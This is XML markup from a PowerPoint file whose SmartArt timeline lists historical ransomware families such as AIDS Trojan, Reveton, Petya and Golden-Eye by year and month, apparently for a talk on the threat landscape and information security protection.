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7" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="267" r:id="rId7"/>
    <p:sldId id="278" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="279" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="273" r:id="rId21"/>
    <p:sldId id="281" r:id="rId22"/>
    <p:sldId id="259" r:id="rId23"/>
    <p:sldId id="27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190918D-C21D-4576-9AFC-05C58B061D4E}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Landscape" id="{FF4F65EA-3B51-462B-8373-9464C9B79984}">
          <p14:sldIdLst>
            <p14:sldId id="260"/>
            <p14:sldId id="267"/>
            <p14:sldId id="278"/>
            <p14:sldId id="261"/>
            <p14:sldId id="271"/>
            <p14:sldId id="263"/>
            <p14:sldId id="266"/>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="269"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="INFOSEC protection" id="{B4BB5196-7989-4FC0-83B5-D6A18AD0DBC5}">
          <p14:sldIdLst>
            <p14:sldId id="279"/>
            <p14:sldId id="276"/>
            <p14:sldId id="275"/>
            <p14:sldId id="280"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Missing" id="{E2BB0349-C81A-4E47-A130-9F6A1F78BFDF}">
          <p14:sldIdLst>
            <p14:sldId id="274"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="End of presentation" id="{A3B7A6D5-A9DB-4C92-A422-87F45D333003}">
          <p14:sldIdLst>
            <p14:sldId id="273"/>
            <p14:sldId id="281"/>
            <p14:sldId id="259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993" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="8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EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess11" loCatId="process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8E50F4E-A211-4387-B97C-8204D2D63C7E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="290642" y="1339948"/>
          <a:ext cx="1022729" cy="492876"/>
        </a:xfrm>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0"/>
            <a:t>1989</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3ECDEA85-0997-4DE7-BDA1-9D27574A1BE6}" type="parTrans" cxnId="{22B998FB-6DA3-44DE-8039-70A44451540E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E88C0FE-9E9F-45D8-9EB3-4AB6E6B956AA}" type="sibTrans" cxnId="{22B998FB-6DA3-44DE-8039-70A44451540E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4197E540-D10F-4BDA-84C9-B2027B240EEB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="379667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AIDS Trojan</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78BB0D03-C1B0-4614-BB63-23D6CFFED62B}" type="parTrans" cxnId="{037D1ED7-9660-475E-907C-F4AD249CA9F1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EE9F422-00AE-4222-BD4F-062656D802FD}" type="sibTrans" cxnId="{037D1ED7-9660-475E-907C-F4AD249CA9F1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AEA99DD-79F2-454B-89E9-FC77396C9F1D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="8686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Healthcare industry</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2D73402-9AD4-47A3-93FB-B3C18E3B4F0C}" type="parTrans" cxnId="{B4E4664C-2BB7-4195-971F-F79B38F44C6E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{602E552B-1247-4A9C-B655-B1B1185966C0}" type="sibTrans" cxnId="{B4E4664C-2BB7-4195-971F-F79B38F44C6E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A22019F-6F97-4DC3-963A-583D3D54A632}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="2153288" y="1339948"/>
          <a:ext cx="1022729" cy="492876"/>
        </a:xfrm>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2012</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9D94E7B-0198-4684-BCA7-D1F15AB8F901}" type="parTrans" cxnId="{39AF9F84-592C-4715-B816-2A454335FA6D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40C46F67-A448-4DFF-9ACB-C354C5196E83}" type="sibTrans" cxnId="{39AF9F84-592C-4715-B816-2A454335FA6D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AE14328-0EE2-49D7-98C5-68FCA23BDFFA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="2242314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Reveton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EA9DC085-EAD3-474C-B8A0-5119234F5699}" type="parTrans" cxnId="{8A722DB8-690F-4486-8D68-C5FBE3FBBBBD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E40F6E7-1E16-499D-BD19-570269F4F62E}" type="sibTrans" cxnId="{8A722DB8-690F-4486-8D68-C5FBE3FBBBBD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65A643D8-FAD8-427F-B77E-324519DFF77F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May</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B490BD3-91C5-4AD9-B795-4720D22F1C89}" type="parTrans" cxnId="{3603CE7F-B3FC-4746-835B-FEBA7784AF37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1CFAE85-B44C-4654-BCFF-0F4929233B2A}" type="sibTrans" cxnId="{3603CE7F-B3FC-4746-835B-FEBA7784AF37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="5389635" y="1339948"/>
          <a:ext cx="1022729" cy="492876"/>
        </a:xfrm>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2016</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{180ECF10-61BF-4891-A06A-93E397C04263}" type="parTrans" cxnId="{270815E9-4A88-4DB4-9040-920BB982ABD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8B63689-AE32-480F-B66B-8481F7137AF6}" type="sibTrans" cxnId="{270815E9-4A88-4DB4-9040-920BB982ABD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A6DB3FE-C39B-447E-9F35-B0AA149632E9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January</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59337257-76BB-40A8-A3C4-453905802E16}" type="parTrans" cxnId="{DE067B6E-5705-40C5-95E8-34489ECF6FE3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{092AA806-E93B-48B2-8CC6-74C5945CE54C}" type="sibTrans" cxnId="{DE067B6E-5705-40C5-95E8-34489ECF6FE3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="6763335" y="1339948"/>
          <a:ext cx="1022729" cy="492876"/>
        </a:xfrm>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2017</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B45DE71B-8C61-4A29-BBB0-5AA953CF7542}" type="parTrans" cxnId="{A81889D7-B4F1-469E-A91B-D36894BED34C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E03609D5-4748-4E3C-8F59-7CA6A6BDD666}" type="sibTrans" cxnId="{A81889D7-B4F1-469E-A91B-D36894BED34C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA1701F6-7B57-4B04-9E00-64FC8D153085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February</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6530B81-68FB-4CB6-934B-339EA4E796B5}" type="parTrans" cxnId="{AA493673-DAC7-4571-B247-A7E1C831035C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CDBA56F-B9FD-42B0-9B00-3DC230E39858}" type="sibTrans" cxnId="{AA493673-DAC7-4571-B247-A7E1C831035C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2B36E35-C0B0-4334-8739-9BF9E9FB5D05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="2242314" y="2802844"/>
          <a:ext cx="884708" cy="426573"/>
        </a:xfrm>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2015</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBF237B2-913C-443F-91AC-8B8E5466EC06}" type="parTrans" cxnId="{AD057F79-C151-4DC3-9793-2FDF8AE171AF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20D42858-A62B-4E8D-9EF6-6A40BC06725C}" type="sibTrans" cxnId="{AD057F79-C151-4DC3-9793-2FDF8AE171AF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2954943F-5285-463A-B698-04520A1BD32F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July</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5DC84F6-4E3C-4539-9F18-A0E869CC4E2A}" type="parTrans" cxnId="{3EB6105C-E0B9-4969-A054-ABC56B5F35AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0BC579CB-4C7B-4437-BC20-E7469EADC514}" type="sibTrans" cxnId="{3EB6105C-E0B9-4969-A054-ABC56B5F35AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E254E419-9028-47D7-AF1D-1A906DE8D535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August</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86E35CE0-1634-4F77-ADEC-CB4188C7E99F}" type="parTrans" cxnId="{06AFC709-C173-4B48-9B2B-A04C5BA4890A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3D775DB-BA6C-4FA1-B2A7-3AF6D9FC73C2}" type="sibTrans" cxnId="{06AFC709-C173-4B48-9B2B-A04C5BA4890A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D27999AE-7406-4AEF-B545-A971181005A0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November</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30E761FE-E7BF-41DD-93FF-52719C026A9F}" type="parTrans" cxnId="{F9681597-BB7A-435E-9D0E-6555D76D2D34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8FB1D80A-0B4A-4C77-8326-4A19E48BC34A}" type="sibTrans" cxnId="{F9681597-BB7A-435E-9D0E-6555D76D2D34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D778B9C-D4C8-4CBF-85A8-5C61C2856AA3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ORX Locker</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F32DBE7-FD5C-47D1-AA47-B8268C821327}" type="parTrans" cxnId="{3981D260-8025-4D04-9173-AD77B1DC46D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35C29C19-27B1-4910-8625-D22F864476E6}" type="sibTrans" cxnId="{3981D260-8025-4D04-9173-AD77B1DC46D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C86D8086-E51C-48C3-AAF5-B9FC743FD733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Hidden Tear</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BBF5152D-467A-4492-B5AB-BF73FB783087}" type="parTrans" cxnId="{BDEA8F2E-0548-473A-A16F-4548C38B7934}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{029611B3-4865-4FF0-924A-94F2820B9CAF}" type="sibTrans" cxnId="{BDEA8F2E-0548-473A-A16F-4548C38B7934}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19030E09-E059-48BF-B8AB-98C8D0D51C3B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Tox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336F919C-68FF-4EB5-8574-C99A498671AA}" type="parTrans" cxnId="{698312B9-B91F-4223-97DA-B7561D9B07BF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{565C201F-8FB4-4879-AF68-E0F68048409D}" type="sibTrans" cxnId="{698312B9-B91F-4223-97DA-B7561D9B07BF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7B020D7-91FB-41A0-A68B-F91D309B7434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Encryptor</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="500" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> RaaS</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{399B7E58-3CD1-4467-80DA-4B61D7EC8A1B}" type="parTrans" cxnId="{6BECFBE3-3821-45B4-9C19-03F902D8483C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{275132FD-A613-49C7-BDB8-65E319D65DF2}" type="sibTrans" cxnId="{6BECFBE3-3821-45B4-9C19-03F902D8483C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EECAFC5D-A0B0-4747-A397-2BAE44382D31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Crypto-locker by FAKBEN</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2F5FCD4-268F-4C39-88DE-72E7F42FDEF6}" type="parTrans" cxnId="{CDDF304C-3381-4290-A21C-72CF3EBB22B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B60663DA-0CD1-4CA1-9934-E01989B647F3}" type="sibTrans" cxnId="{CDDF304C-3381-4290-A21C-72CF3EBB22B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{016A765C-1BC9-4515-9A0B-06A4CFB676FB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Ransom32</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30B6A45E-556A-46E7-9611-CD0D602B297F}" type="parTrans" cxnId="{680E8EAB-E321-4F0F-821D-A664F933330A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC983CFB-476D-4235-8B4B-4E88A4945822}" type="sibTrans" cxnId="{680E8EAB-E321-4F0F-821D-A664F933330A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43F0E182-20E4-4E20-BB27-BB45ED6AD1D6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December</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4EFBB008-E0FD-4055-808C-CEE53D875550}" type="parTrans" cxnId="{C8EECF99-0351-4257-86AF-3C999E8D4CA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A84729A-F474-41AA-92D2-39975C154C88}" type="sibTrans" cxnId="{C8EECF99-0351-4257-86AF-3C999E8D4CA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D992EB0-C4AC-4CFD-AD54-0120734F0122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Petya</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D53B10A-A20D-4023-BED6-4034B7F71C2E}" type="parTrans" cxnId="{0CB41EF6-E074-4310-89D7-366AC5D8A6AB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C98400DE-D267-4392-8C81-3564F4A4922C}" type="sibTrans" cxnId="{0CB41EF6-E074-4310-89D7-366AC5D8A6AB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10BEAE10-5856-484F-89AD-6BEBC4C3A9E9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Petya and Mischa</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{786C824A-0BDB-404D-A629-AF48AC60F990}" type="parTrans" cxnId="{61B92BEF-11D1-4581-8DFD-234C308512E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{526553EC-AABA-4101-AFBF-AC2C2409235C}" type="sibTrans" cxnId="{61B92BEF-11D1-4581-8DFD-234C308512E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF2B7093-D65D-4ED0-918C-D785AEEF6904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Golden-Eye</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE7E2037-9394-4545-A076-CAC0F284ACA5}" type="parTrans" cxnId="{DD6DFB38-31C1-4946-BB63-538D009F3AA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{744C6625-E71C-4B1F-A12C-479F75D583FA}" type="sibTrans" cxnId="{DD6DFB38-31C1-4946-BB63-538D009F3AA7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A4DD0EB-AA7A-4FAE-AFE6-D841FD92B14A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May</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7932C74-7314-41D1-85DC-948100FC3654}" type="parTrans" cxnId="{0254A9A3-E76B-4D91-A5E5-D3F34B6925BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34D6AC51-5948-4335-B6FF-16073EFFF178}" type="sibTrans" cxnId="{0254A9A3-E76B-4D91-A5E5-D3F34B6925BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B060201-DFF2-44E9-ABAF-9C402E6D31D9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June</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
